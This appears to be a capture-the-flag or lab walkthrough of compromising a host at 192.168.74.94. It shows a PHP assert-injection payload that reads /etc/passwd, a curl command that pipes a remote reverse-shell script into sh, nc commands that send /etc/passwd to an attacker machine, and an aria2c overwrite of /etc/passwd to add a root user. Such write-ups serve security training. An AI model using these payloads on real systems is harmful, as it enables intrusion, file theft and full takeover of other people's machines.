
NETWORK

ENUMERATION



Changing the url we get the following


LFI via PHP’s ‘assert’
Looks like we have an ‘assert’ injection payload may work as explained here https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-via-phps-assert. The LFI appears to be filtering traversal strings such as “..” and responding with something along the lines of “Hacking attempt” or “Nice try!”.
using the following payload (url encoded)
' and die(show_source('/etc/passwd')) or '

We get the passwd file

Looking into the index.php we can see the code responsible of the LFI

FOOTHOLD
RCE
We have remote code execution on the server which can be proven by the following command
curl http://192.168.74.94/index.php?page=%27%20and%20die(system(%27id%27))%20or%20%27

Reverse shell as www-data
Using the following reverse shell code

then visiting the following url
curl 192.168.74.94/index.php?page=%27%20and%20die%28system%28%27curl%20http%3A%2F%2F192.168.49.74%2Freverse.txt%7Csh%27%29%29%20or%20%27


PRIV ESCALATION

Linpeas.sh has revealled the following

Let go and crack this private key

We have found “sozefasalshwamra”

Add a new user
Looking into the suids we have found the following

In gtfobin we have found the following

using aria2c we can overwrite the /etc/passwd, with adding a dummy user to the system.
First, let’s start with copying the machine passwd in our local
# 1. Send file to attack machine
nc -nv 192.168.45.196 443 < /etc/passwd
# 2. In the attack machine, receive the data
nc nvlp 443 > /etc/passwd


then we have to generate a password with one of the following commands.
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
we continue by adding the user hacker with the password hacker
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /tmp/passwd
Using aria2c, we can copy the new passwd into the machine
aria2c -o passwd "http://192.168.45.74/newpasswd" --allow-overwrite=true

Thanks to that previous actions we now have a user with root access
